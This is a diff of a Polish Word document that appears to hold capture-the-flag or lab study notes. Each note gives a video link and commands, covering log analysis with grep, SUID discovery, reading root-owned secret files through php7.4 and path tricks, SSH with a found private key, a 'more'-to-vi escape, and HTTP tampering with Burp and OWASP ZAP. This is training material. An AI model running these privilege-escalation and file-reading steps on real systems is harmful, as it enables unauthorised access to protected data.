--- a/BSS.docx
+++ b/BSS.docx
@@ -6,6 +6,19 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2121</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">Funkcja skrótu SHA3 </w:t>
       </w:r>
@@ -258,56 +271,17 @@
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Automatyczne wylogowywanie</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Dostęp do plików należących do użytkownika root </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Podwyższenie uprawnień użytkownika </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Inna powłoka niż Bash </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Usunięty plik </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza logów z konkretnego zakresu czasowego </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId13" w:history="1">
@@ -317,56 +291,78 @@
             <w:b w:val="0"/>
             <w:bCs w:val="0"/>
           </w:rPr>
-          <w:t>https://youtu.be/cz1N_5UT9PI</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cd /var/log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cat audit.log | grep -e "08:0[0-2]:[0-5][0-9]"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza logów konkretnej usługi </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+          <w:t>https://youtu.be/7gF8aXn0N5M</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ssh -l alic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ssh -l alice </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>[host_ip]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "cat secret.txt"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Dostęp do plików należących do użytkownika root </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId14" w:history="1">
@@ -376,48 +372,64 @@
             <w:b w:val="0"/>
             <w:bCs w:val="0"/>
           </w:rPr>
-          <w:t>https://youtu.be/uHVRAqXXxAE</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cd /var/log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cat audit.log | grep -e "vsftpd\|ftp\|xinetd"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza udanych prób logowania się na SSH </w:t>
+          <w:t>https://youtu.be/1DISmbatA2A</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd archive</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>./file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>../root/secret.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Podwyższenie uprawnień użytkownika </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -435,48 +447,48 @@
             <w:b w:val="0"/>
             <w:bCs w:val="0"/>
           </w:rPr>
-          <w:t>https://youtu.be/EiLWkwlr-WI</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cd /var/log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cat audit.log | grep -e "sshd.*invalid"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza wielu nieudanych prób logowania się na SSH </w:t>
+          <w:t>https://youtu.be/PKY6ULiuXug</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>find / -perm /6000 2&gt;/dev/null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>php7.4 /root/secret.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Inna powłoka niż Bash </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -494,6 +506,426 @@
             <w:b w:val="0"/>
             <w:bCs w:val="0"/>
           </w:rPr>
+          <w:t>https://youtu.be/9vUhS8QU1hI</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cat /etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd /usr/bin/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cat bob</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd ~</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ls -la</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (-&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>bob_key.pem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ssh -l bob localhost -i bob_key.pem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ( na zmniejszonym oknie terminala by zatrzymać działanie programu ‘more’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>klawisz ‘v’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>: e secret.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Usunięty plik </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId17" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/n6bWUYs8qMw</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ps -x ( lub ps -aux)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>szukamy w /proc danego PIDa i lecimy do /fd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analiza logów z konkretnego zakresu czasowego </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/cz1N_5UT9PI</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd /var/log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cat audit.log | grep -e "08:0[0-2]:[0-5][0-9]"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analiza logów konkretnej usługi </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/uHVRAqXXxAE</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd /var/log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cat audit.log | grep -e "vsftpd\|ftp\|xinetd"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analiza udanych prób logowania się na SSH </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/EiLWkwlr-WI</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd /var/log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cat audit.log | grep -e "sshd.*invalid"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analiza wielu nieudanych prób logowania się na SSH </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
           <w:t>https://youtu.be/Wo9RXZpXjdQ</w:t>
         </w:r>
       </w:hyperlink>
@@ -566,6 +998,7 @@
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Podatność SQL Injection typu Time Based </w:t>
       </w:r>
     </w:p>
@@ -574,13 +1007,31 @@
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Podgląd nagłówków odpowiedzi </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/-6K7SqADd2s</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Manipulowanie parametrami HTTP </w:t>
@@ -589,6 +1040,48 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId23" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/0VoR903FNqk</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>id=6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Automatyczny skan aplikacji </w:t>
@@ -597,6 +1090,58 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId24" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/R5cjc2nEgU4</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">odpalamy OWASP -&gt; Automatyczne skanowanie -&gt; wpsujemy url, zaznaczamy Sidera -&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wyszukujemy url ze sćieżką /robots.txt i sprawdzamy response i odczytujemy kod.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Modyfikacja żądań HTTP </w:t>
@@ -605,6 +1150,41 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/0vP1NliWQhE</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>firefoxem (opera nie działała) wysyłamy zmieniony nagłówek przez inspectora i szukamy flagi z odpowiedzią</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Powtarzanie żądania HTTP </w:t>
@@ -613,6 +1193,62 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId26" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/S_gVNlVh1QM</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>(chyba z firefoxa wystarczy od razu jeden request zrobić)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a jak nie to odpalić burpa -&gt; załączyć proxy w firefoxie -&gt; wysłać żadanie -&gt; dodać w burpie przechwycone rządanie do repeatera</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tam jeszcze raz wysłać żądanie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Wyszukiwanie właściwej wartości parametru metodą siłową </w:t>
@@ -625,6 +1261,29 @@
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
+      <w:hyperlink r:id="rId27" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
